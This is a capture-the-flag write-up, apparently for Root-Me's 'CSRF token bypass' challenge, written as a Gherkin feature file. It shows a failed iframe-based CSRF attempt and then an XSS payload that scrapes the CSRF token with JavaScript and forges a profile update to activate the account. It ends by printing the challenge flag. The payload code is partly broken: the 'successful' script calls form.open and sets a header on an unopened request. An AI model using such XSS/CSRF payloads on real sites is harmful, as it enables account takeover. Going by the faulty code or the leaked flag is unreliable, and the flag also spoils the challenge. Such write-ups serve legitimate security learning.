## Version 2.0
## language: en

Feature: Web client-rootme
  Site:
    rootme
  Category:
    Web client
  User:
    dianaosorio97
  Goal:
    Activate your account to access intranet.

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Ubuntu          | 18.04         |
    | Chrome          | 71.0.3578.98-1|
  Machine information:
    Given I am accessing the page
    """
    https://www.root-me.org/es/Challenges/Web-Cliente/CSRF-token-bypass
    """
    And I clicked in the start challenge button
    And I see a login form
    And I register me
    Then I see different options
    """
    contact, profile, private, logout
    """
    Then I choose the option private
    Then I see the following text
    """
    Your account has not been validated by an administrator,
    please wait.
    """
    Then I choose the option profile
    And I see the form update profile
    And I see a checkbox disabled

  Scenario: Fail:bypass with iframe
    Given The page allows the sending of messages by means of a form
    And I try modify the profile form
    """
    <html>
    <body>
    <iframe style="display:none" id="test" src="http://challenge01
    .root-me.org/web-client/ch23/?action=profile"></iframe>
    <form id="profile" action="http://challenge01.root-me.org/web-
    client/ch23/?action=profile" method="post"
    enctype="multipart/form-data">
    <input type ="hidden" name="username" value = "din">
    <input type="hidden"  name="status" value=on>
    <input id = "token" type="hidden"  name="token" value=
    "be30f6d2e0fd2ba3f108f916d8a6c067">
    <button type="submit">Submit</button>
    </form>
    """
    Then I try get the token
    """
    <script>
        //document.getElementById("test").submit();
        var form = document.getElementById("test");
        var token = document.getElementById("test").contentDocument.forms[0].
      token.value;
        var data = 'username=din&status=on&token='+token;
        data = xmlHttp.reponseText;
        xmlHttp.open("POST","http://challenge01.root-me.org/web-client
      /ch23/?action=profile", true);
       xmlHttp.setRequestHeader("Content-Type",
      "application/x-www-form-urlencoded");
       var xmlHttp = new XMLHttpRequest();
       xmlHttp.send(data);
    </script>
    </body>
    </html>
    """
    And This doesn't work

  Scenario: Success:using xss
    Given The page is vulnerable to xss
    """
    <a href="?action=profile">Profile</a>
    <!--| <a href="?action=search">Search</a> -->|
    """
    Then I can insert javascript code
    Then I writte the form to insert data
    And I use the token into the contact form
    """
    <form id="xss" action="http://challenge01.root-me.org
    /web-client/ch23/?action=profile" method="POST"
    enctype="multipart/form-data">
      <input type ="hidden" name="username" value = "din">
      <input type="hidden"  name="status" value="on">
      <input id = "token" type="hidden"  name="token" value=
    "47d2f65af18a4751576cc19448d8d2d2">
    <button type="submit">Submit</button>
    """
    And I use javascript to get the token
    """
    <script>
        var form = document.getElementById("xss");
        var xmlHttp = new XMLHttpRequest();
        xmlHttp.open("GET", "http://challenge01.root-me.org/
      web-client/ch23/?action=profile", false);
        xmlHttp.send();
        var token = (xmlHttp.responseText.match(/[abcdef0123456789]{32}/));
        var data = 'username=din&status=on&token='+token;
        form.open("POST","http://challenge01.root-me.org/web-client/ch23
      /?action=profile", false);
      xmlHttp.setRequestHeader("Content-Type", "application/
      x-www-form-urlencoded");
      xmlHttp.send(data);
    </script>
    """
    Then I send the message in the form
    And I go to the option private
    And I see the flag
    """
    Byp4ss_CSRF_T0k3n-w1th-XSS
    """
    And I put in the password section
    And I solve the challenge
